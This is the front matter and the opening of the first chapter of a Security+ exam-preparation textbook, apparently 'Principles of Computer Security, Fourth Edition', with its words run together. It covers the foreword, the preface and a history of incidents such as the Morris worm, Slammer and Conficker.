CodeIntegrityTheCapabilityMaturityModelIntegrationChapter21Review
Chapter22IncidentResponseFoundationsofIncidentResponse
IncidentManagementAnatomyofanAttackGoalsofIncidentResponse
IncidentResponseProcessPreparationSecurityMeasureImplementationIncidentIdentification/DetectionInitialResponseIncidentIsolationStrategyFormulationInvestigationRecovery/ReconstitutionProcedures
ReportingFollow-up/LessonsLearned
StandardsandBestPracticesStateofCompromiseNISTDepartmentofJusticeIndicatorsofCompromiseCyberKillChainMakingSecurityMeasurable
Chapter22Review
Chapter23ComputerForensicsEvidence
TypesofEvidenceStandardsforEvidenceThreeRulesRegardingEvidence
ForensicProcessAcquiringEvidenceIdentifyingEvidenceProtectingEvidenceTransportingEvidenceStoringEvidenceConductingtheInvestigation
AnalysisChainofCustodyMessageDigestandHashHostForensics
FileSystems WindowsMetadataLinuxMetadata
DeviceForensicsNetworkForensicsE-Discovery
ReferenceModelBigDataCloud
Chapter23Review
Chapter24LegalIssuesandEthicsCybercrime
CommonInternetCrimeSchemesSourcesofLawsComputerTrespassSignificantU.S.LawsPaymentCardIndustryDataSecurityStandard(PCIDSS)Import/ExportEncryptionRestrictionsNon-U.S.LawsDigitalSignatureLawsDigitalRightsManagement
EthicsChapter24Review
Chapter25PrivacyPersonallyIdentifiableInformation(PII)
SensitivePIINotice,Choice,andConsent
U.S.PrivacyLawsPrivacyActof1974FreedomofInformationAct(FOIA)
FamilyEducationRecordsandPrivacyAct(FERPA)U.S.ComputerFraudandAbuseAct(CFAA)U.S.Children’sOnlinePrivacyProtectionAct(COPPA)VideoPrivacyProtectionAct(VPPA)HealthInsurancePortability&AccountabilityAct(HIPAA)Gramm-Leach-BlileyAct(GLBA)CaliforniaSenateBill1386(SB1386)U.S.BankingRulesandRegulationsPaymentCardIndustryDataSecurityStandard(PCIDSS)FairCreditReportingAct(FCRA)FairandAccurateCreditTransactionsAct(FACTA)
Non-FederalPrivacyConcernsintheUnitedStatesInternationalPrivacyLaws
OECDFairInformationPracticesEuropeanLawsCanadianLawsAsianLaws
Privacy-EnhancingTechnologiesPrivacyPolicies
PrivacyImpactAssessmentWebPrivacyIssues
CookiesPrivacyinPractice
UserActionsDataBreaches
Chapter25Review
AppendixACompTIASecurity+ExamObjectives:SY0-401
AppendixB
AbouttheDownloadSystemRequirementsDownloadingTotalTesterPremiumPracticeExamSoftwareTotalTesterPremiumPracticeExamSoftware
InstallingandRunningTotalTesterTechnicalSupport
TotalSeminarsTechnicalSupportMcGraw-HillEducationContentSupport
Glossary
Index
FOREWORD
Selectingabookistrickyforme.Ifitisforpersonalreading,willIlikereadingit?Ifitisformyprofessionaldevelopment,willitmeettheneed?Ifitisformystudents,willitbeclearandconcise?ThisneweditionofPrinciplesofComputerSecuritypassesallthreetestswithflyingcolors.Ienjoyedreadingit.IfIneededtopasstheCompTIASecurity+orotherpractitionerexamination,itwouldprepareme.Andfinally,basedonpersonalexperience,studentswilllikethisbookandfindittobevaluablereadingandstudymaterial.Itevenhaspracticeexamsforcertificationformyconvenience.Formorethan40yearsIhaveworkedinsomevarietyofcomputer
security.Whenpeopleaskmewhatdefinesmyjob,Irespondwith“Idon’tknowuntilIreadthemorningnewspaperbecausethesecurityenvironmentchangesrapidly.”Ifyouwanttogetintothecomputersecurityindustry,readingandunderstandingthisbookisagreatintroduction.Nowinitsfourthedition,the25chaptersofPrinciplesofComputerSecurityfocusonabroadspectrumofimportanttopicstopreparethereadertobeacertifiedcomputersecuritypractitioner.Therealdealmakerformeisthefurtherendorsementofthecontents:thebookisbasedonCompTIAApprovedQualityContent(CAQC)andservesasbothanexampreparationguideandausefulreference.Dr.Conklinandhisteamofcoauthorseasethereaderintothemeatof
thetopicbyreviewingbothsecuritytrendsandconcepts.Theythenaddresssecurityfromtwodifferentperspectives.Firsttheyfocusontheorganization’sneedforsecurity,andthenfocusontheimportantroleofpeople.Thesetwoperspectivesareintertwined;itisessentialforasecuritypractitionertounderstandthesecurityenvironmentandhowthepeoplemakeitwork.Everypractitionerneedstounderstandtheunderlyingtechnologyand
toolsofcomputersecurity.Someindividualshaveanideaaboutsecuritytopicsbutdonothavetheessentialknowledgeneededtoaddressthemindepth.Theauthorshaveprovidedninemasterfulchaptersintroducingthesekeyconcepts.Forexample,inasinglechaptertheyprovidethebasisforthereadertodealwithsecurityofnetworks.Thischaptersupportseverythingthereaderneedstoknowtoaddressstandardsandprotocols,infrastructuresecurity,remoteaccessandauthentication,aswellaswireless.Theauthorsintegratetheseconceptstosupportpublickeyinfrastructure(PKI)andintrusiondetectionsystemsfornetworksecuritywithoutforgettingtheimportanceofphysicalsecurityinprotectingtheinformationsystemaswellasinfrastructure.Oneofthemostdebatedtopicsinsecurityistheimportanceof
cryptography.Somewouldassertthatalmostalldigitalsecuritycanbeaccomplishedwithcryptography,thatsecurityandcryptographyareinseparable,withcryptographybeingthecornerstoneofsecuringdatainbothtransmissionandstorage.However,ifcomputersecuritywereaseasyas“encrypteverything,”thiswouldbeaveryshortbook.Whilecryptographyisveryimportantandaverycomplexsecuritymeasure,itisnotapanacea—butitdoesprovideforlivelydiscussions.Theauthorsbringallthesecomponentstogetherwithacomprehensivechapteronintrusiondetectionandprevention.Oncethereaderhasmasteredthebasics,theauthorsaddresse-mail,
malicioussoftware,instantmessaging,andwebcomponentsinsuchawaythatthereadercanapplyhisorherknowledgeofnetworksandsecurityfundamentals.Thereaderwillthenbeprovidedwithanoverviewofsecuresoftwaredevelopment.In2015,boththeU.S.DepartmentofHomelandSecurityandCSOmagazineconcludedthatpoorlydevelopedsoftwareisoneofthebiggestcyberthreats—perhaps90percentofthethreatscomethroughpoorsoftwaredesign.Inthefinalanalysis,securityisreallyallaboutriskmanagement.What
isyourorganization’sappetiteforriskandhowisthatriskmanaged?Thechapterscoveringriskmanagementleadthereaderthroughtheselesstechnicalissuestogainanunderstandinghowtheseimpactthe
organization.Baselinesandchangemanagementareessentialtounderstandingwhatassetsarebeingsecuredandhowtheyarebeingchanged.Areaderwholearnstheseskillswellwillbeabletoworkinincidentresponse,disasterrecovery,andbusinesscontinuity.Understandingtheseprocessesandhowtheyworkwithtechnicalissuesexpandscareeropportunities.Theauthorsconcludetheirreviewoftheprinciplesofcomputersecurity
withanexaminationofprivacy,legalissues,andethics.Althoughthesetopicsappearattheendofthebook,theyarecrucialissuesinthemodernworld.Remember,asacomputersecuritypractitioner,youwillhavelegalaccesstomoredataandinformationthananyelseintheorganization.Althoughnotthelastchapterinthebook,Ihavedecidedtocommenton
forensicslast.Theauthorshavedoneawonderfuljobofaddressingthiscomplextopic.Butwhymentionitlast?Becausemanytimesforensicsiswhatonedoesaftercomputersecurityfails.Itmakesagoodepitaphforawonderfulbook.Tonightitis15degreesandsnowingoutsidewhileIsitinmystudy—
warm,dry,andcomfortable;myhomeismycastle.Notbadformid-winterinIdaho;however,IshouldnotforgetthatonereasonIamcomfortableisbecausecertifiedcomputersecuritypractitionersareprotectingmyinformationandprivacyaswellasthecriticalinfrastructurethatsupportsit.
ForInstructorsIhavetaughtfromprioreditionsofthisbookandhaveuseditscompanionlaboratorymanualforseveralyears.BothPrinciplesofComputerSecurity,FourthEditionandPrinciplesofComputerSecurityLabManual,FourthEditionhaveinstructormaterialsonacompanionWebsiteavailabletoadoptinginstructors.Instructormanuals,includingtheanswerstotheend-of-chapterquestions,PowerPointslides,andthetestbankofquestionsforuseasquizzesorexams,makepreparationasnap.
CoreyD.Schou,PhDSeriesEditor
UniversityProfessorofInformaticsProfessorofComputerScience
DirectoroftheNationalInformationAssuranceTrainingandEducationCenter
IdahoStateUniversity
PREFACE
InformationandcomputersecurityhasmovedfromtheconfinesofacademiatomainstreamAmericainthe21stcentury.Databreaches,informationdisclosures,andhigh-profilehacksinvolvingthetheftofinformationandintellectualpropertyseemtobearegularstapleofthenews.Ithasbecomeincreasinglyobvioustoeverybodythatsomethingneedstobedonetosecurenotonlyournation’scriticalinfrastructurebutalsothebusinesseswedealwithonadailybasis.Thequestionis,“Wheredowebegin?”Whatcantheaverageinformationtechnologyprofessionaldotosecurethesystemsthatheorsheishiredtomaintain?Oneimmediateansweriseducationandtraining.Ifwewanttosecureourcomputersystemsandnetworks,weneedtoknowhowtodothisandwhatsecurityentails.Ourwayoflife,fromcommercetomessagingtobusiness
communicationsandevensocialmedia,dependsontheproperfunctioningofourworldwideinfrastructure.Acommonthreadthroughoutallofthese,however,istechnology—especiallytechnologyrelatedtocomputersandcommunication.Thus,anindividual,organization,ornationwhowantedtocausedamagetothisnationcouldattackitnotjustwithtraditionalweaponsbutwithcomputersthroughtheInternet.Complacencyisnotanoptionintoday’shostilenetworkenvironment.Theprotectionofournetworksandsystemsisnotthesoledomainoftheinformationsecurityprofessional,butrathertheresponsibilityofallwhoareinvolvedinthedesign,development,deployment,andoperationofthesystemsthatarenearlyubiquitousinourdailylives.Withvirtuallyeverysystemwedependupondailyatrisk,theattacksurfaceandcorrespondingriskprofileisextremelylarge.Informationsecurityhasmaturedfromaseriesoftechnicalissuestoacomprehensiveriskmanagementproblem,andthisbookprovidesthefoundationalmaterialtoengageinthefieldina
professionalmanner.So,wheredoyou,theITprofessionalseekingmoreknowledgeon
security,startyourstudies?Thisbookoffersacomprehensivereviewoftheunderlyingfoundationsandtechnologiesassociatedwithsecuringoursystemsandnetworks.TheITworldisoverflowingwithcertificationsthatcanbeobtainedbythoseattemptingtolearnmoreabouttheirchosenprofession.Theinformationsecuritysectorisnodifferent,andtheCompTIASecurity+examoffersabasiclevelofcertificationforsecurity.InthepagesofthisbookyouwillfindnotonlymaterialthatcanhelpyoupreparefortakingtheCompTIASecurity+exambutalsothebasicinformationthatyouwillneedinordertounderstandtheissuesinvolvedinsecuringyourcomputersystemsandnetworkstoday.Innowayisthisbookthefinalsourceforlearningallaboutprotectingyourorganization’ssystems,butitservesasapointfromwhichtolaunchyoursecuritystudiesandcareer.Onethingiscertainlytrueaboutthisfieldofstudy—itnevergets
boring.Itconstantlychangesastechnologyitselfadvances.Somethingelseyouwillfindasyouprogressinyoursecuritystudiesisthatnomatterhowmuchtechnologyadvancesandnomatterhowmanynewsecuritydevicesaredeveloped,atitsmostbasiclevel,thehumanisstilltheweaklinkinthesecuritychain.Ifyouarelookingforanexcitingareatodelveinto,thenyouhavecertainlychosenwisely.Securityoffersachallengingblendoftechnologyandpeopleissues.Andsecuringthesystemsoftomorrowwillrequireeveryonetoworktogether,notjustsecurity,butdevelopers,operators,andusersalike.We,theauthorsofthisbook,wishyouluckasyouembarkonanexcitingandchallengingcareerpath.
Wm.ArthurConklin,Ph.D.GregoryB.White,Ph.D.
INTRODUCTION
Computersecurityisbecomingincreasinglyimportanttodayasthenumberofsecurityincidentssteadilyclimbs.Manycorporationsarenowspendingsignificantportionsoftheirbudgetsonsecurityhardware,software,services,andpersonnel.Theyarespendingthismoneynotbecauseitincreasessalesorenhancestheproducttheyprovide,butbecauseofthepossibleconsequencesshouldtheynottakeprotectiveactions.Securityhasbecomeacomprehensiveriskmanagementexerciseinfirmsthattaketherisksseriously.
WhyFocusonSecurity?Securityisnotsomethingthatwewanttohavetopayfor;itwouldbeniceifwedidn’thavetoworryaboutprotectingourdatafromdisclosure,modification,ordestructionfromunauthorizedindividuals,butthatisnottheenvironmentwefindourselvesintoday.Instead,wehaveseenthecostofrecoveringfromsecurityincidentssteadilyrisealongwiththeriseinthenumberofincidentsthemselves.Sincehackershavelearnedhowtomonetizehacks,theplayingfieldhasbecomesignificantlymoredangerous.Therearenowincentivesforaprofessionalclassofhackerwiththeintentofreapingbenefitsbothlongandshortterm.Withtheadventofadvancedpersistentthreats,theriseofnation-statehacking,andtheincreaseincriminalactivityfrombotnetstoransomware,theITplayingfieldisnowviewedasacontestedenvironment,onewherehackingcanresultingains.Lawenforcementistoooverwhelmedandunder-resourcedtomakeadentintheproblem,andtheresultisaneedfortrainedsecuritypractitionersinallbusinesssegments—andafurtherneedforsecurity-awareITpersonnelinregularITpositions.Securityhasbecomeamainstreamtopic.
AGrowingNeedforSecuritySpecialistsToprotectourcomputersystemsandnetworks,wewillneedasignificantnumberofnewsecurityprofessionalstrainedinthemanyaspectsofcomputerandnetworksecurity.Thisisnotaneasytask,asthesystemsconnectedtotheInternetbecomeincreasinglycomplex,withsoftwarewhoselinesofcodenumberinthemillions.Understandingwhythisissuchadifficultproblemtosolveisnothardifyouconsiderhowmanyerrorsmightbepresentinapieceofsoftwarethatisseveralmillionlineslong.Whenyouaddtheadditionalfactorofhowfastsoftwareisbeingdeveloped—fromnecessityasthemarketisconstantlymoving—understandinghowerrorsoccuriseasy.Notevery“bug”inthesoftwarewillresultinasecurityhole,butit
doesn’ttakemanytoaffecttheInternetcommunitydrastically.Wecan’tjustblamethevendorsforthissituation,becausetheyarereactingtothedemandsofgovernmentandindustry.Mostvendorsarefairlyadeptatdevelopingpatchesforflawsfoundintheirsoftware,andpatchesareconstantlyissuedtoprotectsystemsfrombugsthatmayintroducesecurityproblems.Thisintroducesawholenewproblemformanagersandadministrators—patchmanagement.Howimportantthishasbecomeiseasilyillustratedbyhowmanyofthemostrecentsecurityeventshaveoccurredasaresultofasecuritybugforwhichapatchwasavailablemonthspriortothesecurityincident;membersofthecommunityhadnotcorrectlyinstalledthepatch,however,thusmakingtheincidentpossible.Oneofthereasonsthishappensisthatmanyoftheindividualsresponsibleforinstallingthepatchesarenottrainedtounderstandthesecurityimplicationssurroundingtheholeortheramificationsofnotinstallingthepatch.Manyoftheseindividualssimplylackthenecessarytraining.Becauseoftheneedforanincreasingnumberofsecurityprofessionals
whoaretrainedtosomeminimumlevelofunderstanding,certificationssuchastheCompTIASecurity+havebeendeveloped.Prospectiveemployerswanttoknowthattheindividualtheyareconsideringhiringknowswhattodointermsofsecurity.Theprospectiveemployee,inturn,wantstohaveawaytodemonstratehisorherlevelofunderstanding,
whichcanenhancethecandidate’schancesofbeinghired.Thecommunityasawholesimplywantsmoretrainedsecurityprofessionals.
PreparingYourselffortheCompTIASecurity+ExamPrinciplesofComputerSecurity,FourthEditionisdesignedtohelpprepareyoutotaketheCompTIASecurity+certificationexam.Whenyoupassit,youwilldemonstrateyouhavethatbasicunderstandingofsecuritythatemployersarelookingfor.Passingthiscertificationexamwillnotbeaneasytask,foryouwillneedtolearnmanythingstoacquirethatbasicunderstandingofcomputerandnetworksecurity.
HowThisBookIsOrganizedThebookisdividedintochapterstocorrespondwiththeobjectivesoftheexamitself.Someofthechaptersaremoretechnicalthanothers—reflectingthenatureofthesecurityenvironmentwhereyouwillbeforcedtodealwithnotonlytechnicaldetailsbutalsootherissuessuchassecuritypoliciesandproceduresaswellastrainingandeducation.Althoughmanyindividualsinvolvedincomputerandnetworksecurityhaveadvanceddegreesinmath,computerscience,informationsystems,orcomputerorelectricalengineering,youdonotneedthistechnicalbackgroundtoaddresssecurityeffectivelyinyourorganization.Youdonotneedtodevelopyourowncryptographicalgorithm,forexample;yousimplyneedtobeabletounderstandhowcryptographyisused,alongwithitsstrengthsandweaknesses.Asyouprogressinyourstudies,youwilllearnthatmanysecurityproblemsarecausedbythehumanelement.Thebesttechnologyintheworldstillendsupbeingplacedinanenvironmentwherehumanshavetheopportunitytofoulthingsup—andalltoooftendo.
OnwardandUpward
Atthispoint,wehopethatyouarenowexcitedaboutthetopicofsecurity,evenifyouweren’tinthefirstplace.Wewishyouluckinyourendeavorsandwelcomeyoutotheexcitingfieldofcomputerandnetworksecurity.
INSTRUCTORWEBSITE
Forinstructorresources,visitwww.mhprofessional.com/PrinciplesSecurity4e.Adoptingteacherscanaccessthesupportmaterialsidentifiedbelow.ContactyourMcGraw-HillEducationsalesrepresentativefordetailsonhowtoaccessthematerials.
InstructorMaterialsThePrinciplesofComputerSecuritycompanionWebsite(www.mhprofessional.com/PrinciplesSecurity4e)providesmanyresourcesforinstructors:
Answerkeystotheend-of-chapteractivitiesinthetextbook
Answerkeystothelabmanualactivities(labmanualavailableseparately)
EngagingPowerPointslidesonthelecturetopics(includingfull-colorartworkfromthebook)
AnInstructorManual
Accesstotestbankfilesandsoftwarethatallowsyoutogenerateawidearrayofpaper-ornetwork-basedtests,andthatfeaturesautomaticgrading
Hundredsofpracticequestionsandawidevarietyofquestiontypesanddifficultylevels,enablingyoutocustomizeeachtesttomaximizestudentprogress
Blackboardcartridgesandotherformatsmayalsobeavailableuponrequest;contactyoursalesrepresentative
chapter1 IntroductionandSecurityTrends
Securityismostlyasuperstition.Itdoesnotexistinnature,nordothechildrenofmenasawholeexperienceit.Avoidingdangerisnosaferinthelongrunthanoutrightexposure.Lifeis
W
eitheradaringadventureornothing.
—HELENKELLER
Inthischapter,youwilllearnhowto
Definecomputersecurity
Discusscommonthreatsandrecentcomputercrimesthathavebeencommitted
Listanddiscussrecenttrendsincomputersecurity
Describecommonavenuesofattacks
Describeapproachestocomputersecurity
Discusstherelevantethicalissuesassociatedwithcomputersecurity
hyshouldwebeconcernedaboutcomputerandnetworksecurity?Allyouhavetodoisturnonthetelevisionorreadthenewspapertofindoutaboutavarietyofsecurityproblemsthataffectournation
andtheworldtoday.Thedangertocomputersandnetworksmayseemtopaleincomparisontothethreatofterroriststrikes,butinfacttheaveragecitizenismuchmorelikelytobethetargetofanattackontheirownpersonalcomputer,oracomputertheyuseattheirplaceofwork,thantheyaretobethedirectvictimofaterroristattack.Thischapterwillintroduceyoutoanumberofissuesinvolvedinsecuringyourcomputersandnetworksfromavarietyofthreatsthatmayutilizeanyofanumberofdifferentattacks.
TheComputerSecurityProblemFiftyyearsagocompaniesdidnotconductbusinessacrosstheInternet.Onlinebankingandshoppingwereonlydreamsinsciencefictionstories.Today,however,millionsofpeopleperformonlinetransactionseveryday.CompaniesrelyontheInternettooperateandconductbusiness.Vastamountsofmoneyaretransferredvianetworks,intheformofeitherbanktransactionsorsimplecreditcardpurchases.Wherevertherearevast
amountsofmoney,therearethosewhowilltrytotakeadvantageoftheenvironmenttoconductfraudortheft.Therearemanydifferentwaystoattackcomputersandnetworkstotakeadvantageofwhathasmadeshopping,banking,investment,andleisurepursuitsasimplematterof“draggingandclicking”(ortapping)formanypeople.Identitytheftissocommontodaythatmosteveryoneknowssomebodywho’sbeenavictimofsuchacrime,iftheyhaven’tbeenavictimthemselves.ThisisjustonetypeofcriminalactivitythatcanbeconductedusingtheInternet.Therearemanyothersandallareontherise.
DefinitionofComputerSecurityComputersecurityisnotasimpleconcepttodefine,andhasnumerouscomplexitiesassociatedwithit.Ifoneisreferringtoacomputer,thenitcanbeconsideredsecurewhenthecomputerdoeswhatitissupposedtodoandonlywhatitissupposedtodo.Butaswasnotedearlier,thesecurityemphasishasshiftedfromthecomputertotheinformationbeingprocessed.Informationsecurityisdefinedbytheinformationbeingprotectedfromunauthorizedaccessoralterationandyetisavailabletoauthorizedindividualswhenrequired.Whenonebeginsconsideringtheaspectsofinformation,itisimportanttorealizethatinformationisstored,processed,andtransferredbetweenmachines,andallofthesedifferentstatesrequireappropriateprotectionschemes.Informationassuranceisatermusedtodescribenotjusttheprotectionofinformation,butameansofknowingthelevelofprotectionthathasbeenaccomplished.
TechTip
HistoricalComputerSecurityComputersecurityisanever-changingissue.Fiftyyearsago,computersecuritywasmainlyconcernedwiththephysicaldevicesthatmadeupthecomputer.Atthetime,computerswerethehigh-valueitemsthatorganizationscouldnotaffordtolose.Today,computerequipmentisinexpensivecomparedtothevalueofthedataprocessedbythecomputer.Nowthehigh-value
itemisnotthemachine,buttheinformationthatitstoresandprocesses.Thishasfundamentallychangedthefocusofcomputersecurityfromwhatitwasintheearlyyears.Todaythedatastoredandprocessedbycomputersisalmostalwaysmorevaluablethanthehardware.
Computersecurityandinformationsecuritybothrefertoastatewherethehardwareandsoftwareperformonlydesiredactionsandtheinformationisprotectedfromunauthorizedaccessoralterationandisavailabletoauthorizeduserswhenrequired.
HistoricalSecurityIncidentsByexaminingsomeofthecomputer-relatedcrimesthathavebeencommittedoverthelast30orsoyears,wecanbetterunderstandthethreatsandsecurityissuesthatsurroundourcomputersystemsandnetworks.Electroniccrimecantakeanumberofdifferentforms,buttheoneswewillexamineherefallintotwobasiccategories:crimesinwhichthecomputerwasthetarget,andincidentsinwhichacomputerwasusedtoperpetratetheact(forexample,therearemanydifferentwaystoconductbankfraud,oneofwhichusescomputerstoaccesstherecordsthatbanksprocessandmaintain).Wewillstartourtourofcomputercrimeswiththe1988Internetworm
(Morrisworm),oneofthefirstrealInternetcrimecases.Priorto1988,criminalactivitywaschieflycenteredonunauthorizedaccesstocomputersystemsandnetworksownedbythetelephonecompanyandcompaniesthatprovideddial-upaccessforauthorizedusers.Virusactivityalsoexistedpriorto1988,havingstartedintheearly1980s.
TheMorrisWorm(November1988)RobertMorris,thenagraduatestudentatCornellUniversity,releasedwhathasbecomeknownastheInternetworm(ortheMorrisworm).Theworminfectedroughly10percentofthemachinesthenconnectedtotheInternet
(whichamountedtoapproximately6000infectedmachines).Thewormcarriednomaliciouspayload,theprogrambeingobviouslya“workinprogress,”butitdidwreakhavocbecauseitcontinuallyre-infectedcomputersystemsuntiltheycouldnolongerrunanyprograms.
CitibankandVladimirLevin(June–October1994)StartingaboutJuneof1994andcontinuinguntilatleastOctoberofthesameyear,anumberofbanktransfersweremadebyVladimirLevinofSt.Petersburg,Russia.Bythetimeheandhisaccompliceswerecaught,theyhadtransferredanestimated$10million.Eventuallyallbutabout$400,000wasrecovered.Levinreportedlyaccomplishedthebreak-insbydialingintoCitibank’scashmanagementsystem.Thissystemallowedclientstoinitiatetheirownfundtransferstootherbanks.
KevinMitnick(February1995)KevinMitnick’scomputeractivitiesoccurredoveranumberofyearsduringthe1980sand1990s.Arrestedin1995,heeventuallypledguiltytofourcountsofwirefraud,twocountsofcomputerfraud,andonecountofillegallyinterceptingawirecommunicationandwassentencedto46monthsinjail.Inthepleaagreement,MitnickadmittedtohavinggainedunauthorizedaccesstoanumberofdifferentcomputersystemsbelongingtocompaniessuchasMotorola,Novell,Fujitsu,andSunMicrosystems.Hedescribedusinganumberofdifferent“tools”andtechniques,includingsocialengineering,sniffers,andclonedcellulartelephones.
TechTip
IntellectualCuriosityIntheearlydaysofcomputercrime,muchofthecriminalactivitycenteredongainingunauthorizedaccesstocomputersystems.Inmanyearlycases,theperpetratorofthecrimedidnotintendtocauseanydamagetothecomputerbutwasinsteadonaquestof“intellectualcuriosity”—tryingtolearnmoreaboutcomputersandnetworks.Todaytheubiquitousnatureofcomputersandnetworkshaseliminatedtheperceivedneedfor
individualstobreakintocomputerstolearnmoreaboutthem.Whiletherearestillthosewhodabbleinhackingfortheintellectualchallenge,itismorecommontodayfortheintellectualcuriositytobereplacedbymaliciousintent.Whateverthereason,todayitisconsideredunacceptable(andillegal)togainunauthorizedaccesstocomputersystemsandnetworks.
OmegaEngineeringandTimothyLloyd(July1996)OnJuly30,1996,asoftware“timebomb”wentoffatOmegaEngineering,aNewJersey–basedmanufacturerofhigh-techmeasurementandcontrolinstruments.Twentydaysearlier,TimothyLloyd,acomputernetworkprogramdesigner,hadbeendismissedfromthecompanyafteraperiodofgrowingtensionbetweenLloydandmanagementatOmega.TheprogramthatranonJuly30deletedallofthedesignandproductionprogramsforthecompany,severelydamagingthesmallfirmandforcingthelayoffof80employees.TheprogramwaseventuallytracedbacktoLloyd,whohadleftitinretaliationforhisdismissal.
WorcesterAirportand“Jester”(March1997)InMarchof1997,telephoneservicestotheFAAcontroltoweraswellastheemergencyservicesattheWorcesterAirportandthecommunityofRutland,Massachusetts,werecutoffforaperiodofsixhours.Thisdisruptionoccurredasaresultofanattackonthephonenetworkbyateenagecomputer“hacker”whowentbythename“Jester.”
TheMelissaVirus(March1999)Melissaisthebestknownoftheearlymacro-typevirusesthatattachthemselvestodocumentsforprogramsthathavelimitedmacroprogrammingcapability.Thevirus,writtenandreleasedbyDavidSmith,infectedaboutamillioncomputersandcausedanestimated$80millionindamages.
TechTip
SpeedofVirusProliferationThespeedatwhichtheSlammerwormspreadservedasawakeupcalltosecurityprofessionals.ItdrovehomethepointthattheInternetcouldbeadverselyimpactedinamatterofminutes.Thisinturncausedanumberofprofessionalstorethinkhowpreparedtheyneededtobeinordertorespondtovirusoutbreaksinthefuture.Agoodfirststepistoapplypatchestosystemsandsoftwareassoonaspossible.Thiswillofteneliminatethevulnerabilitiesthatthewormsandvirusesaredesignedtotarget.
TheLoveLetterVirus(May2000)Alsoknownasthe“ILOVEYOU”wormandthe“LoveBug,”theLoveLetterviruswaswrittenandreleasedbyaPhilippinestudentnamedOneldeGuzman.Theviruswasspreadviae-mailwiththesubjectlineof“ILOVEYOU.”Estimatesofthenumberofinfectedmachinesworldwidehavebeenashighas45million,accompaniedbyapossible$10billionindamages(itshouldbenotedthatfiguresliketheseareextremelyhardtoverifyorcalculate).
TheCodeRedWorm(2001)OnJuly19,2001,inaperiodof14hours,over350,000computersconnectedtotheInternetwereinfectedbytheCodeRedworm.Thecostestimateforhowmuchdamagethewormcaused(includingvariationsofthewormreleasedonlaterdates)exceeded$2.5billion.Thevulnerabilitywasabuffer-overflowconditioninMicrosoft’sIISwebservers,hadbeenknownforamonth.
TheSlammerWorm(2003)OnSaturday,January25,2003,theSlammerwormwasreleased.Itexploitedabuffer-overflowvulnerabilityincomputersrunningMicrosoftSQLServerorSQLServerDesktopEngine.LikethevulnerabilityinCodeRed,thisweaknesswasnotnewand,infact,hadbeendiscoveredandapatchreleasedinJulyof2002.Withinthefirst24hoursofSlammer’srelease,thewormhadinfectedatleast120,000hostsandcausednetwork
outagesandthedisruptionofairlineflights,elections,andATMs.Atitspeak,Slammer-infectedhostsweregeneratingareported1TBofworm-relatedtrafficeverysecond.Thewormdoubleditsnumberofinfectedhostsevery8seconds.Itisestimatedthatittooklessthan10minutestoreachglobalproportionsandinfect90percentofthepossiblehostsitcouldinfect.
WebsiteDefacements(2006)InMayof2006,aTurkishhackerusingthehandleiSKORPiTXsuccessfullyhackedover21,000websitesinasingleeffort.Therationaleforhisactionswasneverdetermined,andoverthenextfewyearshehackedhundredsofthousandsofwebsites,defacingtheircoverpagewithastatementofhishack.Anuisancetosome,thoseaffectedhadtocleanuptheirsystems,includingrepairingvulnerabilities,orhewouldstrikeagain.
Cyberwar?(2007)InMayof2007,thecountryofEstoniawascrippledbyamassivedenial-of-service(DoS)cyberattackagainstallofitsinfrastructure,firms(banks),andgovernmentoffices.ThisattackwastracedtoIPaddressesinRussia,butwasneverclearlyattributedtoagovernment-sanctionedeffort.
OperationBotRoast(2007)In2007,theFBIannouncedthatithadconductedOperationBotRoast,identifyingover1millionbotnetcrimevictims.Intheprocessofdismantlingthebotnets,theFBIarrestedseveralbotnetoperatorsacrosstheUnitedStates.Althoughseeminglyabigsuccess,thiseffortmadeonlyasmalldentinthevastvolumeofbotnetsinoperation.
Conficker(2008–2009)Inlate2008andearly2009,securityexpertsbecamealarmedwhenitwasdiscoveredthatmillionsofsystemsattachedtotheInternetwereinfectedwiththeDownadupworm.AlsoknownasConficker,thewormwas
believedtohaveoriginatedinUkraine.Infectedsystemswerenotinitiallydamagedbeyondhavingtheirantivirussolutionupdatesblocked.Whatalarmedexpertswasthefactthatinfectedsystemscouldbeusedinasecondaryattackonothersystemsornetworks.Eachoftheseinfectedsystemswaspartofwhatisknownasabotnetwork(orbotnet)andcouldbeusedtocauseaDoSattackonatargetorbeusedfortheforwardingofspame-mailtomillionsofusers.
U.S.ElectricPowerGrid(2009)InApril2009,HomelandSecuritySecretaryJanetNapolitanotoldreportersthattheUnitedStateswasawareofattemptsbybothRussiaandChinatobreakintotheU.S.electricpowergrid,mapitout,andplantdestructiveprogramsthatcouldbeactivatedatalaterdate.Sheindicatedthattheseattackswerenotnewandhadinfactbeengoingonforyears.OnearticleintheKansasCityStar,forexample,reportedthatin1997thelocalpowercompany,KansasCityPowerandLight,encounteredperhaps10,000attacksfortheentireyear.By2009thecompanyexperienced30–60millionattacks.
TryThis!SoftwarePatchesOneofthemosteffectivemeasuressecurityprofessionalscantaketoaddressattacksontheircomputersystemsandnetworksistoensurethatallsoftwareisuptodateintermsofvendor-releasedpatches.Manyoftheoutbreaksofvirusesandwormswouldhavebeenmuchlesssevereifeverybodyhadappliedsecurityupdatesandpatcheswhentheywerereleased.Fortheoperatingsystemthatyouuse,gotoyourfavoritewebbrowsertofindwhatpatchesexistfortheoperatingsystemandwhatvulnerabilitiesorissuesthepatcheswerecreatedtoaddress.
FiberCableCut(2009)OnApril9,2009,awidespreadphoneandInternetoutagehittheSanJoseareainCalifornia.Thisoutagewasnottheresultofagroupofdeterminedhackersgainingunauthorizedaccesstothecomputersthatoperatethese
networks,butinsteadoccurredasaresultofseveralintentionalcutsinthephysicalcablesthatcarrythesignals.Thecutsresultedinalossofalltelephone,cellphone,andInternetserviceforthousandsofusersintheSanJosearea.Emergencyservicessuchas911werealsoaffected,whichcouldhavehadsevereconsequences.
TheCurrentThreatEnvironmentThethreatsofthepastweresmaller,targeted,andinmanycasesonlyanuisance.Astimehasgoneon,moreorganizedelementsofcybercrimehaveenteredthepicturealongwithnation-states.From2009andbeyond,thecyberthreatlandscapebecameconsiderablymoredangerous,withnewadversariesouttoperformoneoftwofunctions:denyyoutheuseofyourcomputersystems,oruseyoursystemsforfinancialgainincludingtheftofintellectualpropertyorfinancialinformationincludingpersonallyidentifiableinformation.
